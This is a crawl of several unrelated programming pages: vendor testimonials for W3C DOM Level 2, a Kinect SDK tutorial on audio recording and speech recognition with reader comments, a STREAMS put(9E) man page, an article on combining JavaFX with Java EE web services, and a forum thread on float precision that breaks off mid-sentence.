http://www.codeproject.com/Articles/15741/Scripting-NET-applications-with-VBScript
CC-MAIN-2015-35
en
refinedweb
IBM is delighted to see the Document Object Model Level 2 become an official W3C Recommendation. This new version includes important new features, such as Namespaces, which will enable programmers to better exploit XML for e-business applications. IBM feels it is very important to ensure that there are high quality, open source reference implementations of the DOM standard available. We have made significant contributions to the Apache Xerces parser which already supports DOM Level 2. IBM will continue to contribute to the DOM activity in the W3C as it evolves. -- Bob Sutor, Director for e-business Standards Strategy, IBM As the Web continues to evolve, the value of a core set of DOM features grows ever more important. Those core features provide content and application developers alike with a common programming model across a variety of languages and applications, which has been a direct contributor to the success of XML. As co-editor of the DOM Level 2 Style Specification, Microsoft has made contributions to the development of the DOM, and hopes to do so in the future. -- David Turner, Product Manager and Technical Evangelist, XML Technologies, Microsoft Netscape is strongly committed to supporting the W3C DOM Level 2 and other web standards because they are the foundation for next-generation web applications. The DOM Level 2 Core support for advanced XML features such as namespaces sets the stage for supporting emerging XML-based technologies. The CSS Interfaces will enable applications to dynamically reformat content from scripting languages such as JavaScript, and the event model enables the creation of web applications with user interfaces that are as rich and interactive as native applications but that run across platforms and devices. Netscape will continue to work within the W3C to define innovative standards such as the DOM Level 2 and through the open source development initiative at mozilla.org to support these standards in the Mozilla browser and products based upon it such as Netscape 6. -- Jim Hamerly, Vice-President of Client Product Development, Netscape Communications Corporation Nexgenix is delighted to contribute to the DOM development. DOM helps developers to create Web applications that take advantage of the wealth of components and data available on the Web by providing a standard interface that enables many hardware and software platforms to talk to each other smoothly. -- Dr. Shlomit Ritz Finkelstein, Director of Research, Nexgenix, Inc. With DOM Level 2, internet developers can now use the flexibility of XML to make web content fully interoperable across multiple platforms and multiple languages. The support of DOM Level 2 in the Oracle XML Developer's Kit for Java is essential for delivering the new generation of web sites where content has to be dynamic and exchangeable. -- Chuck Rozwat, Executive Vice President, Server Technologies, Oracle Corporation The DOM is an extremely important W3C Recommendation, and Level 2 adds to the basic functionality defined in Level 1. XMetaL 2.0, our award-winning XML editor, supports the Level 1 XML DOM and we have found it to be very useful in allowing the integration with other DOM-supporting products, such as repositories, databases, and B2B systems. We intend to implement DOM Level 2 functionality in our products in the future. -- Lauren Wood, Director of Product Technology, SoftQuad Software Inc.
http://www.w3.org/2000/11/dom-level2-testimonial
CC-MAIN-2015-35
en
refinedweb
Audio Fundamentals (Beta 2 SDK) - Posted: Jun 16, 2011 at 10:15 AM - 67,255 Views - 13 audio data from the Kinect microphone array, a demo adapted from the built in audio recorder. The video also covers speech recognition using Kinect. in a Slider and two Button controls, and we'll also use some stack panels to be sure everything lines up nicely: XAML <Window x: <Grid> <StackPanel> <StackPanel Orientation="Horizontal"> <Label Content="Seconds to Record: " /> <Label Content="{Binding ElementName=RecordForTimeSpan, Path=Value}" /> </StackPanel> <Slider Name="RecordForTimeSpan" Minimum="1" Maximum="25" IsSnapToTickEnabled="True" /> <StackPanel Orientation="Horizontal" HorizontalAlignment="Center"> <Button Content="Record" Height="50" Width="100" Name="RecordButton" /> <Button Content="Play" Height="50" Width="100" Name="PlayButton" /> </StackPanel> <MediaElement Name="audioPlayer" /> </StackPanel> </Grid> </Window> For each button, we'll want to create a click event. Go to the properties window (F4), select the RecordButton, select the Events tab, and double click on the Click event to create the RecordButton_Click event. Do the same for the Play Button so we have the PlayButton_Click event wired up as well The first task is to add in the Kinect Audio library: C# using Microsoft.Research.Kinect.Audio; Visual Basic Imports Microsoft.Research.Kinect.Audio There are two ways we can record audio. You can record audio synchronously, meaning that the UI thread will in effect be “frozen” while we record audio using it. Alternatively, you can record audio on a separate thread so that the UI thread remains responsive to events while the recording happens in parallel. Our sample includes both methods so you can choose which one is required for your application. We’ll build variables to hold the amount of time we’ll record, the file name of the recording, and to enable asynchronous recording, we’ll use the FinishedRecording event to notify the UI thread that we're done recording: C# double _amountOfTimeToRecord; string _lastRecordedFileName; private event RoutedEventHandler FinishedRecording; Visual Basic Private _amountOfTimeToRecord As Double Private _lastRecordedFileName As String Private Event FinishedRecording As RoutedEventHandler Next we’ll create the RecordAudio method that will do the actual audio recording. C# private void RecordAudio() { } Visual Basic Private Sub RecordAudio() End Sub To create threads, we'll add in the System.Threading namespace: C# using System.Threading; Visual Basic Imports System.Threading Now we'll create the thread and do some simple end-user management in the RecordButton_Click event. First we'll disable the two buttons, record the audio, and create a unique file name. Then we have the option of calling the RecordAudio method either synchronously or asynchronously as shown below: ‘C# private void RecordButton_Click(object sender, RoutedEventArgs e) { RecordButton.IsEnabled = false; PlayButton.IsEnabled = false; _amountOfTimeToRecord = RecordForTimeSpan.Value; _lastRecordedFileName = DateTime.Now.ToString("yyyyMMddHHmmss") + "_wav.wav"; var t = new Thread(new ThreadStart(RecordAudio)); t.SetApartmentState(ApartmentState.MTA); t.Start(); } Visual Basic Private Sub RecordButton_Click(ByVal sender As Object, ByVal e As RoutedEventArgs) RecordButton.IsEnabled = False PlayButton.IsEnabled = False _amountOfTimeToRecord = RecordForTimeSpan.Value _lastRecordedFileName = Date.Now.ToString("yyyyMMddHHmmss") & "_wav.wav" Dim t = New Thread(New ThreadStart(AddressOf RecordAudio)) t.SetApartmentState(ApartmentState.MTA) t.Start() End Sub From here, this sample and the built-in sample are pretty much the same. We'll only add three differences: the FinishedRecording event, a dynamic playback time, and the dynamic file name. Note that the WriteWavHeader function is the exact same as the one in the built-in demo as well. Since we leverage different types of streams, we'll add the System.IO namespace: C# using System.IO; Visual Basic Imports System.IO The entire RecordAudio method: C# private void RecordAudio() { using (var source = new KinectAudioSource()) { var recordingLength = (int) _amountOfTimeToRecord * 2 * 16000; var buffer = new byte[1024]; source.SystemMode = SystemMode.OptibeamArrayOnly; using (var fileStream = new FileStream(_lastRecordedFileName, FileMode.Create)) { WriteWavHeader(fileStream, recordingLength); //Start capturing audio using (var audioStream = source.Start()) { //Simply copy the data from the stream down to the file int count, totalCount = 0; while ((count = audioStream.Read(buffer, 0, buffer.Length)) > 0 && totalCount < recordingLength) { fileStream.Write(buffer, 0, count); totalCount += count; } } } if (FinishedRecording != null) FinishedRecording(null, null); } } Visual Basic Private Sub RecordAudio() Using source = New KinectAudioSource Dim recordingLength = CInt(Fix(_amountOfTimeToRecord)) * 2 * 16000 Dim buffer = New Byte(1023) {} source.SystemMode = SystemMode.OptibeamArrayOnly Using fileStream = New FileStream(_lastRecordedFileName, FileMode.Create) WriteWavHeader(fileStream, recordingLength) 'Start capturing audio Using audioStream = source.Start() 'Simply copy the data from the stream down to the file Dim count As Integer, totalCount As Integer = 0 count = audioStream.Read(buffer, 0, buffer.Length) Do While count > 0 AndAlso totalCount < recordingLength fileStream.Write(buffer, 0, count) totalCount += count count = audioStream.Read(buffer, 0, buffer.Length) Loop End Using End Using RaiseEvent FinishedRecording(Nothing, Nothing) End Using End Sub So we've recorded the audio, saved it, and fired off an event that said we're done—let's hook into it. We'll wire up that event in the MainWindow constructor: c# public MainWindow() { InitializeComponent(); FinishedRecording += new RoutedEventHandler(MainWindow_FinishedRecording); } Visual Basic Public Sub New() InitializeComponent() AddHandler FinishedRecording, AddressOf MainWindow_FinishedRecording End Sub Since that event will return on a non-UI thread, we'll need to use the Dispatcher to get us back on a UI thread so we can reenable those buttons: C# void MainWindow_FinishedRecording(object sender, RoutedEventArgs e) { Dispatcher.BeginInvoke(new ThreadStart(ReenableButtons)); } private void ReenableButtons() { RecordButton.IsEnabled = true; PlayButton.IsEnabled = true; } Visual Basic Private Sub MainWindow_FinishedRecording(sender As Object, e As RoutedEventArgs) Dispatcher.BeginInvoke(New ThreadStart(ReenableButtons)) End Sub Private Sub ReenableButtons() RecordButton.IsEnabled = True PlayButton.IsEnabled = True End Sub And finally, we'll make the Media element play back the audio we just saved! We'll also verify both that the file exists and that the user recorded some audio: c# private void PlayButton_Click(object sender, RoutedEventArgs e) { if (!string.IsNullOrEmpty(_lastRecordedFileName) && File.Exists(_lastRecordedFileName)) { audioPlayer.Source = new Uri(_lastRecordedFileName, UriKind.RelativeOrAbsolute); audioPlayer.LoadedBehavior = MediaState.Play; audioPlayer.UnloadedBehavior = MediaState.Close; } } Visual Basic Private Sub PlayButton_Click(sender As Object, e As RoutedEventArgs) If (Not String.IsNullOrEmpty(_lastRecordedFileName)) AndAlso File.Exists(_lastRecordedFileName) Then audioPlayer.Source = New Uri(_lastRecordedFileName, UriKind.RelativeOrAbsolute) audioPlayer.LoadedBehavior = MediaState.Play audioPlayer.UnloadedBehavior = MediaState.Close End If End Sub To do speech recognition, we need to bring in the speech recognition namespaces from the speech SDK: C# using Microsoft.Speech.AudioFormat; using Microsoft.Speech.Recognition; Visual Basic Imports Microsoft.Speech.AudioFormat Imports Microsoft.Speech.Recognition In VB we'll also need to add in a MTA flag as well under the Sub Main. C# does not need this. Visual Basic <MTAThread()> _ Shared Sub Main(ByVal args() As String) Next, we need to setup the KinectAudioSource in a way that's compatbile for speech recognition: C# using (var source = new KinectAudioSource()) { source.FeatureMode = true; source.AutomaticGainControl = false; //Important to turn this off for speech recognition source.SystemMode = SystemMode.OptibeamArrayOnly; //No AEC for this sample } Visual Basic Using source = New KinectAudioSource source.FeatureMode = True source.AutomaticGainControl = False 'Important to turn this off for speech recognition source.SystemMode = SystemMode.OptibeamArrayOnly 'No AEC for this sample End Using With that in place, we can initialize the SpeechRecognitionEngine to use the Kinect recognizer, which was downloaded earlier: C# private const string RecognizerId = "SR_MS_en-US_Kinect_10.0"; RecognizerInfo ri = SpeechRecognitionEngine.InstalledRecognizers().Where(r => r.Id == RecognizerId).FirstOrDefault(); Visual Basic Private Const RecognizerId As String = "SR_MS_en-US_Kinect_10.0" Dim ri As RecognizerInfo = SpeechRecognitionEngine.InstalledRecognizers().Where(Function(r) r.Id = RecognizerId).FirstOrDefault() Next, a "grammar" needs to be setup, which specifies which words the speech recognition engine should listen for. The following code creates a grammar for the words "red", "blue" and "green". C# using (var sre = new SpeechRecognitionEngine(ri.Id)) { var colors = new Choices(); colors.Add("red"); colors.Add("green"); colors.Add("blue"); var gb = new GrammarBuilder(); //Specify the culture to match the recognizer in case we are running in a different culture. gb.Culture = ri.Culture; gb.Append(colors); // Create the actual Grammar instance, and then load it into the speech recognizer. var g = new Grammar(gb); sre.LoadGrammar(g); } Visual Basic Using sre = New SpeechRecognitionEngine(ri.Id) Dim colors = New Choices colors.Add("red") colors.Add("green") colors.Add("blue") Dim gb = New GrammarBuilder 'Specify the culture to match the recognizer in case we are running in a different culture gb.Culture = ri.Culture gb.Append(colors) ' Create the actual Grammar instance, and then load it into the speech recognizer. Dim g = New Grammar(gb) sre.LoadGrammar(g) End Using Next, several events are hooked up so you can be notified when a word is recognized, hypothesized, or rejected: C# sre.SpeechRecognized += SreSpeechRecognized; sre.SpeechHypothesized += SreSpeechHypothesized; sre.SpeechRecognitionRejected += SreSpeechRecognitionRejected; Visual Basic AddHandler sre.SpeechRecognized, AddressOf SreSpeechRecognized AddHandler sre.SpeechHypothesized, AddressOf SreSpeechHypothesized AddHandler sre.SpeechRecognitionRejected, AddressOf SreSpeechRecognitionRejected Finally, the audio stream source from the Kinect is applied to the speech recognition engine: C# using (Stream s = source.Start()) { sre.SetInputToAudioStream(s, new SpeechAudioFormatInfo( EncodingFormat.Pcm, 16000, 16, 1, 32000, 2, null)); Console.WriteLine("Recognizing. Say: 'red', 'green' or 'blue'. Press ENTER to stop"); sre.RecognizeAsync(RecognizeMode.Multiple); Console.ReadLine(); Console.WriteLine("Stopping recognizer ..."); sre.RecognizeAsyncStop(); } Visual Basic Using s As Stream = source.Start() sre.SetInputToAudioStream(s, New SpeechAudioFormatInfo(EncodingFormat.Pcm, 16000, 16, 1, 32000, 2, Nothing)) Console.WriteLine("Recognizing. Say: 'red', 'green' or 'blue'. Press ENTER to stop") sre.RecognizeAsync(RecognizeMode.Multiple) Console.ReadLine() Console.WriteLine("Stopping recognizer ...") sre.RecognizeAsyncStop() End Using The event handlers specified earlier display information based on the result of the user's speech being recognized: C# static void SreSpeechRecognitionRejected(object sender, SpeechRecognitionRejectedEventArgs e) { Console.WriteLine("\nSpeech Rejected"); if (e.Result != null) DumpRecordedAudio(e.Result.Audio); } static void SreSpeechHypothesized(object sender, SpeechHypothesizedEventArgs e) { Console.Write("\rSpeech Hypothesized: \t{0}\tConf:\t{1}", e.Result.Text, e.Result.Confidence); } static void SreSpeechRecognized(object sender, SpeechRecognizedEventArgs e) { Console.WriteLine("\nSpeech Recognized: \t{0}", e.Result.Text); } private static void DumpRecordedAudio(RecognizedAudio audio) { if (audio == null) return; int fileId = 0; string filename; while (File.Exists((filename = "RetainedAudio_" + fileId + ".wav"))) fileId++; Console.WriteLine("\nWriting file: {0}", filename); using (var file = new FileStream(filename, System.IO.FileMode.CreateNew)) audio.WriteToWaveStream(file); } Visual Basic Private Shared Sub SreSpeechRecognitionRejected(ByVal sender As Object, ByVal e As SpeechRecognitionRejectedEventArgs) Console.WriteLine(vbLf & "Speech Rejected") If e.Result IsNot Nothing Then DumpRecordedAudio(e.Result.Audio) End If End Sub Private Shared Sub SreSpeechHypothesized(ByVal sender As Object, ByVal e As SpeechHypothesizedEventArgs) Console.Write(vbCr & "Speech Hypothesized: " & vbTab & "{0}" & vbTab & "Conf:" & vbTab & "{1}", e.Result.Text, e.Result.Confidence) End Sub Private Shared Sub SreSpeechRecognized(ByVal sender As Object, ByVal e As SpeechRecognizedEventArgs) Console.WriteLine(vbLf & "Speech Recognized: " & vbTab & "{0}", e.Result.Text) End Sub Private Shared Sub DumpRecordedAudio(ByVal audio As RecognizedAudio) If audio Is Nothing Then Return End If Dim fileId As Integer = 0 Dim filename As String filename = "RetainedAudio_" & fileId & ".wav" Do While File.Exists(filename) fileId += 1 filename = "RetainedAudio_" & fileId & ".wav" Loop Console.WriteLine(vbLf & "Writing file: {0}", filename) Using file = New FileStream(filename, System.IO.FileMode.CreateNew) audio.WriteToWaveStream(file) End Using End Sub In the case of a word being rejected, the audio is written out to a WAV file so it can be listened to later. We've created an application that can record audio for a variable amount of time!! Great! But how about other languages? Like German, French oder Spanish? Are these supported? How about a brief code sample of how general dictation might be used? When I try to modify the sample code to add gb.AddDictation() It crashes on sre.LoadGrammar(g) I've searched high and low for a solution but it appears this is a general issue (that the dictation stuff doesn't work) with the speech API so why is it there? Any help is much appreciated. Thanks typo: visaul -> visual @George Birbilis: fixed the typo @TheZar: are you using the x86 or x64 speech APIs? Very good the tutorial but, do you have the code for Speech Recognition? Thanks Is there any good resource out there for learning the SRGS XML format? The W3C specification is too.. specificationy, and all the tutorials I've found so far deal with the BNF format rather than the XML format. Hi, thanks for sharing us such a good tutorial. But I personally find it is not so difficult to record streaming audio from microphone by standalone audio recorders, not built-in ones. Hi, I'm trying to get both speech recognition and Text to speech to work on a WPF app (C#) I have the Recognition down but the synthesizer part keeps giving an error of "No voice installed on the system or none available with the current security setting." I have both "Microsoft Speech Platform - Software Development Kit (SDK) (Version 10.2)" and "Microsoft Speech Platform - Server Runtime (Version 10.2)" in X86 and X64 installed on my system. Can anyone tell me whats wrong? I would really really appreciate it. Thanks, Hiva I am trying to add speech recognition to a WPF C# app. I am receiving video, skeletal, and depth data correctly, but whenever I start capturing the audio I receive the exception error bellow. I can run the demo above correctly. Is there a reference or an extra step needed when using WPF. System.InvalidCastException was unhandled Message=Unable to cast COM object of type 'System.__ComObject' to interface type 'Microsoft.Research.Kinect.Audio.IMediaObject'. This operation failed because the QueryInterface call on the COM component for the interface with IID '{D8AD0F58-5494-4102-97C5-EC798E59BCF4}' failed due to the following error: No such interface supported (Exception from HRESULT: 0x80004002 (E_NOINTERFACE)). Source=mscorlib StackTrace:) InnerException: [/code] For some reason i only have the Microsoft Lightweight Speech Recognizer v11.0 (SR_MS_ZXX_Lightweight_v11.0) showing up as an available speech recognizer. I've double-checked that i have everything installed correctly, and i'm referencing the C:\Program Files\Microsoft SDKs\Speech\v11.0\Assembly\Microsoft.Speech.dll. Any ideas why i don't see the Kinect Recognizer? Remove this comment Remove this threadclose
https://channel9.msdn.com/Series/KinectSDKQuickstarts/Audio-Fundamentals?format=flash
CC-MAIN-2015-35
en
refinedweb
audio_engine_channels(9E) audio_engine_playahead(9E) - receive messages from the preceding queue #include <sys/types.h> #include <sys/stream.h> #include <sys/stropts.h> #include <sys/ddi.h> #include <sys/sunddi.h> int prefixrput(queue_t *q, mblk_t *mp/* read side */ int prefixwput(queue_t *q, mblk_t *mp/* write side */ Architecture independent level 1 (DDI/DKI). This entry point is required for STREAMS. Pointer to the queue(9S) structure. Pointer to the message block. The primary task of the put() routine is to coordinate the passing of messages from one queue to the next in a stream. The put() routine is called by the preceding stream component (stream module, driver, or stream head). put() routines are designated ``write'' or ``read'' depending on the direction of message flow. With few exceptions, a streams module or driver must have a put() routine. One exception is the read side of a driver, which does not need a put() routine because there is no component downstream to call it. The put() routine is always called before the component's corresponding srv(9E) (service) routine, and so put() should be used for the immediate processing of messages. A put() routine must do at least one of the following when it receives a message: pass the message to the next component on the stream by calling the putnext(9F) function; process the message, if immediate processing is required (for example, to handle high priority messages); or enqueue the message (with the putq(9F) function) for deferred processing by the service srv(9E) routine. Typically, a put() routine will switch on message type, which is contained in the db_type member of the datab structure pointed to by mp. The action taken by the put() routine depends on the message type. For example, a put() routine might process high priority messages, enqueue normal messages, and handle an unrecognized M_IOCTL message by changing its type to M_IOCNAK (negative acknowledgement) and sending it back to the stream head using the qreply(9F) function. The putq(9F) function can be used as a module's put() routine when no special processing is required and all messages are to be enqueued for the srv(9E) routine. Ignored. put() routines do not have user context. srv(9E), putctl(9F), putctl1(9F), putnext(9F), putnextctl(9F), putnextctl1(9F), putq(9F), qreply(9F), queue(9S), streamtab(9S) STREAMS Programming Guide
http://docs.oracle.com/cd/E26502_01/html/E29045/put-9e.html
CC-MAIN-2015-35
en
refinedweb
Combining JavaFX and Java Enterprise Modules JavaFX is built on top of the Java platform; this creates a bonding where it can leverage all of the features of JavaSE. JavaEE is also built in top of JavaSE in much the same way. As a result applications built in both of the platforms can live in the same environment and share features, to each other's advantage. Developers can use this combined strength of application development to leverage productivity in a wide range of devices from desktops, portable devices to servers. The focus of javaFX as a tool is on the client rich interactive visualization of content; it can be a suitable candidate to interface your next enterprise application when merged with JavaEE modules. The fluidity of integration can be a decisive factor though; in coming years its ease of use with wider acceptance is presumable. JavaEE modules and JavaFX Java EE modules are defined by many constituent specifications standardized by Java Community Process (JCP). There are several third party organizations who implement one or more JSRs and package them in a product. Some of these popular product families are - Spring, Guice, Tomcat, Jboss, RestEasy, Glassfish, Hibernate, etc. JavaFX can be seamlessly integrated with Hibernate: Integrate JavaFX, Hibernate and PostgreSQL with the MVC Pattern. Technically there is no restriction to combine JavaFX with the Java EE modules but fluidity of the approach to combine them may be hindered by a not so fluid merging technique. The API support for integrating JavaFX with enterprise modules is emerging. Nonetheless, the JavaSE, JavaEE and JavaFX trio establishes a wider horizon to explore and creativity to churn. JavaFX is best known for its UI support and may replace swing in near future. Developing a client user interface is the best fit for JavaFX to play around in the enterprise arena. This, however, demands a variety of robust controls and their seamless integration of data support. JavaFX Client in JavaEE Modules Client development is significantly different from the enterprise in its objectivity and methodology, such as: - Enterprise applications are now moving towards cloud, thus seamless interaction with the cloud component is essential. - Enterprise applications often implement different patterns such as aspects, inversion of control etc. How much JavaFX can leverage these patterns can be a decisive factor. - Deployment and life-cycle management of the enterprise application is more server oriented. Upgrading server-product is a tedious task and minimization of its downtime is a very crucial process. - Enterprise development is more about resource utilization than visual enhancement. - Enterprise development is primarily focused towards the performance on the server and the server is awake all the time, 24/7. Thus start up time for desktop applications may be critical but in enterprise applications it is hardly an issue. Interestingly, whenever JavaFX lacks a certain aspect it surely can point its finger to its big brother JavaSE. This is technically true because JavaFX lacks only when it is thought of as a separate entity from JavaSE, which it actually is not, per se. JavaFX and Web Services Accessing components through web resources is a common phenomenon for enterprise applications. JavaFX can call remote web resources through SOAP as well as RESTful web services. As SOAP is significantly supported in Java and JavaFX, it poses no problem using the package javax.xml.soap. RESTful web services can be accessed using standard HTTP technologies. Java API has extensive support facilitating access to REST based web services through mainly – java.io and java.net packages. JAX-WS provides support for multiple protocols along with HTTP. JavaFX can leverage JAX-WS annotation support in creating web service clients that use the web services over a network. Example The code snippets below give a minimal sales report using JavaFX, EclipseLink 2.x JPA in the persistence layer and JAX-WS 2.0 specification, the next generation web services API replacing JAX-RPC 1.0. The code can be modified to use any other JPA framework adhering to JSR 317. Persistence Unit @Entity @Table(name = "PRODUCT") @XmlRootElement @NamedQueries({ @NamedQuery(name = "Product.findAll", query = "SELECT p FROM Product p"), }) public class Product implements Serializable { private static final long serialVersionUID = 1L; @Id private Integer productID; private String batchNumber; private String productName; private String productDescription; private float unitPrice; @OneToMany(cascade = CascadeType.ALL, mappedBy = "productID") private Collection<Sales> salesCollection; //... Getter Setter methods } @Entity @Table(name = "REGION") @XmlRootElement @NamedQueries({ @NamedQuery(name = "Region.findAll", query = "SELECT r FROM Region r"), }) public class Region implements Serializable { private static final long serialVersionUID = 1L; @Id private Integer regionID; private String regionName; @OneToMany(cascade = CascadeType.ALL, mappedBy = "regionID") private Collection<Sales> salesCollection; //...Getter Setter methods } @Entity @Table(name = "SALES") @XmlRootElement @NamedQueries({ @NamedQuery(name = "Sales.findAll", query = "SELECT s FROM Sales s"), }) public class Sales implements Serializable { private static final long serialVersionUID = 1L; @Id private Long invoiceNumber; private int salesQuantity; @JoinColumn(name = "regionID", referencedColumnName = "regionID") @ManyToOne(optional = false) private Region regionID; @JoinColumn(name = "productID", referencedColumnName = "productID") @ManyToOne(optional = false) private Product productID; //...Getter and Setter methods } Web Service @WebService(serviceName = "ProductSalesService") public class ProductSalesService { @PersistenceUnit EntityManagerFactory emf; @WebMethod(operationName = "getProducts") public List getProducts() { return emf.createEntityManager().createNamedQuery("Product.findAll").getResultList(); } @WebMethod(operationName = "getRegions") public List getRegions() { return emf.createEntityManager().createNamedQuery("Region.findAll").getResultList(); } @WebMethod(operationName = "getAllSales") public List getAllSales() { return emf.createEntityManager().createNamedQuery("Sales.findAll").getResultList(); } } JavaFX Client public class ProductSalesClient extends Application { private GridPane grid = new GridPane(); private List<Object> sales = new ArrayList<>(); ObservableList<ProdSalesQty> list = FXCollections.observableArrayList(); private BorderPane borderPane = new BorderPane(); private final int columWidth = 200; @Override public void start(Stage primaryStage) { sales = getAllSales(); borderPane.setTop(grid); Scene scene = new Scene(borderPane, 300, 250); tabularData(); grid.addRow(0, barChart("Product", "Product Quantity Sales", "Product Name", "Sales Quantity", list), pieChart("Zonewise Sales", list), barChart("Product", "Product Quantity Sales", "Product Name", "Sales Quantity", list)); primaryStage.setTitle("Product Sales"); primaryStage.setScene(scene); primaryStage.show(); } private void tabularData() { TableView<ProdSalesQty> table = new TableView<>(); TableColumn<ProdSalesQty, String> prodCol = new TableColumn<>("Product"); prodCol.setCellValueFactory(new Callback<TableColumn.CellDataFeatures<ProdSalesQty, String>, ObservableValue<String>>() { @Override public ObservableValue<String> call(CellDataFeatures<ProdSalesQty, String> p) { ProdSalesQty pq = p.getValue(); return new SimpleStringProperty(pq.getProdName()); } }); prodCol.setPrefWidth(columWidth); TableColumn<ProdSalesQty, String> qtyCol = new TableColumn<>("Quantity"); q.getSaleQty())); } }); qtyCol.setPrefWidth(columWidth); TableColumn<ProdSalesQty, String> regCol = new TableColumn<>("Region");(pq.getRegName()); } }); regCol.setPrefWidth(columWidth); TableColumn<ProdSalesQty, String> costCol = new TableColumn<>("Cost"); cost.getCost())); } }); costCol.setPrefWidth(columWidth); table.getColumns().addAll(prodCol, qtyCol, regCol, costCol); for (Object salesObject : sales) { Sales s = (Sales) salesObject; ProdSalesQty psq = new ProdSalesQty(); psq.setProdName(s.getProductID().getProductName()); psq.setSaleQty(s.getSalesQuantity()); psq.setRegName(s.getRegionID().getRegionName()); psq.setCost((s.getSalesQuantity() * s.getProductID().getUnitPrice())); System.out.println(psq.toString()); list.add(psq); } table.setItems(list); borderPane.setCenter(table); } public BarChart barChart(String seriesName, String title, String xLabel, String yLabel, ObservableList<ProdSalesQty> list) { CategoryAxis xAxis = new CategoryAxis(); NumberAxis yAxis = new NumberAxis(); BarChart bc = new BarChart(xAxis, yAxis); bc.getData().clear(); bc.setAnimated(true); bc.setTitle(title); xAxis.setLabel(xLabel); yAxis.setLabel(yLabel); XYChart.Series series1 = new XYChart.Series(); series1.setName(seriesName); ObservableList products = FXCollections.observableList(getProducts()); for (Object productObject : products) { Product p = (Product) productObject; int sum = 0; boolean found = false; for (ProdSalesQty psq : list) { if (p.getProductName().equals(psq.getProdName())) { sum = sum + psq.getSaleQty(); found = true; } } if (found) { series1.getData().add(new XYChart.Data(p.getProductName(), sum)); } } bc.setAnimated(true); bc.getData().add(series1); return bc; } public PieChart pieChart(String title, ObservableList<ProdSalesQty> list) { PieChart pie = new PieChart(); pie.getData().clear(); ObservableList pieChartData = FXCollections.observableArrayList(); ObservableList regions = FXCollections.observableList(getRegions()); for (Object regionObject : regions) { Region r = (Region) regionObject; int sum = 0; boolean found = false; for (ProdSalesQty p : list) { if (r.getRegionName().equals(p.getRegName())) { sum = sum + p.getSaleQty(); found = true; } } if (found) { pieChartData.add(new PieChart.Data(r.getRegionName(), sum)); } } pie.setData(pieChartData); pie.setAnimated(true); pie.setTitle(title); return pie; } public static void main(String[] args) { launch(args); } public class ProdSalesQty { private String prodName; private int saleQty; private String regName; private float cost; //...Getter and Setter methods } private static java.util.List<java.lang.Object> getAllSales() { productsalesclient.ProductSalesService_Service service = new productsalesclient.ProductSalesService_Service(); productsalesclient.ProductSalesService port = service.getProductSalesServicePort(); return port.getAllSales(); } private static java.util.List<java.lang.Object> getRegions() { productsalesclient.ProductSalesService_Service service = new productsalesclient.ProductSalesService_Service(); productsalesclient.ProductSalesService port = service.getProductSalesServicePort(); return port.getRegions(); } private static java.util.List<java.lang.Object> getProducts() { productsalesclient.ProductSalesService_Service service = new productsalesclient.ProductSalesService_Service(); productsalesclient.ProductSalesService port = service.getProductSalesServicePort(); return port.getProducts(); } } Minimal Sales Report JavaFX client accessing JPA model from the Server through Web-services (JAX-WS) to generate the report. JavaFX client JavaFX and Spring Spring framework has revolutionized enterprise application development by introducing the POJO model. Spring framework does not impose any particular programming model, rather it provides an environment where programmers may use the features of the framework according to the requirement. This is quite different from the old caged EJB model of programming. The boilerplate code and constraints of programming are never felt in Spring, though a lot has been simplified recently in the EJB world. Spring gradually became quite popular with the Java community as an alternative to EJB. Spring has extensive support for Inversion of Control, MVC, database access, security authorization control and many more under the same hood. In a sense, Spring provided features for a one stop solution for the enterprise development needs. Perhaps, for this reason Spring is one of the most sought after technologies in the enterprise arena. So when we speak of enterprise development with JavaFX, how far can Spring be left behind? Stephen Chin gave an excellent introduction in matchmaking the two technologies in the articles: Application Initialization, Configuration and FXML and Authentication and Authorization. With the release of the 2.x version, JavaFX has now become closeer to the stable Java APIs; as a result integrating external libraries such as Spring is just a matter of choice. Conclusion Practically, there are various ways to integrate JavaEE modules, moreover JavaFX can leverage JavaSE APIs, so there are a number of possibilities and options available in JavaEE modules to work with. The current list of Java EE 6 JSR is voluminous. Merging each of them in JavaFX is possible with a little or more effort. James L. Weaver demonstrated a way to integrate the external web services of Tweeter API in the article: Best Practices for JavaFX 2.0 Enterprise Applications. However, JavaFX does not have a very fluid integration technique as an enterprise java bean client. The UI controls in the JavaFX framework still need more options to play in the enterprise arena. Nonetheless, efforts are on among the Java community. Till then merging JavaFX with Java EE modules will only be an experiment among the technological enthusiasts.
http://www.developer.com/java/ent/combining-javafx-and-java-enterprise-modules.html
CC-MAIN-2015-35
en
refinedweb
Having such a simple `c` program: Code: #include <stdio.h> #include <float.h> int main( void ) { float fl1 = 0.1; // Set precision to 24 bits _control87(_PC_24, MCW_PC); printf( "fl1: %.10f\n", fl1 ); printf( "fl1*fl1: %.10f\n", fl1*fl1 ); } and compiling it like that: Code: cl /W4 /Od /arch:IA32 teset1.c gives me: fl1: 0.1000000015 fl1*fl1: 0.0100000007 Can someone please explain me why does multiplying the `db1` variable returns 0.0100000007 instead of 0.0100000003 as expected? PS. I know that assigning the `0.1` value to the `float` makes it *truncated* from `double` to `float` but anyhow `0.1000000015 x 0.1000000015` results in **`0,01000000030000000225`** as I've checked in the *Windows Programmer Calculator* #include <stdio.h> #include <float.h> int main( void ) { float fl1 = 0.1; // Set precision to 24 bits _control87(_PC_24, MCW_PC); printf( "fl1: %.10f\n", fl1 ); printf( "fl1*fl1: %.10f\n", fl1*fl1 ); } cl /W4 /Od /arch:IA32 teset1.c Take your calculator and perform the following actions: 1. convert decimal 0,1 to binary (OK, in HEX) 2. truncate it to the max available length for the float 3. multiply to itself 4. convert the result to decimal What result will you get? Victor Nijegorodov Originally Posted by Mulligan Can someone please explain me why does multiplying the `db1` variable returns 0.0100000007 instead of 0.0100000003 as expected? A single-precision FP has 6-7 significant decimal digits, and a double-precision FP has 15-18. A good rule is to consider the significant digits only. The range of significant digits in an FP starts with the first non-zero digit to the left and stretches to the right a certain number of digits determined by the precision. In your example, the 7 of 0.0100000007 is in a non-significant position of a single-precision FP, whereas the 3 of 0.0100000003 is in a significant position of a double-precision (*) FP. It means you can trust the 3, but not the 7. The 7, most likely, has appeared as a result of truncations and roundings rather than proper arithmetic operations. This significant-digit rule is fine for the everyday use of FP numbers. It avoids a lot of head-scratching over the intricacies of the FP standard. But it is, of course, never wrong to study FP in depth. (*) Supposedly, the "Windows Programmer Calculator" works with double precision (at least). Last edited by wolle; December 1st, 2021 at 03:19 AM. In addition to my post #4. Not all decimal numbers have a finite digital representation. This includes 0.1, which requires an infinite number of bits. So when you assign 0.1 to a single-precision FP, there is a truncation error. When you print the FP, you see 0.1000000015, where the 15 is the error. The 15, however, is not part of the significant-digit range and should not be 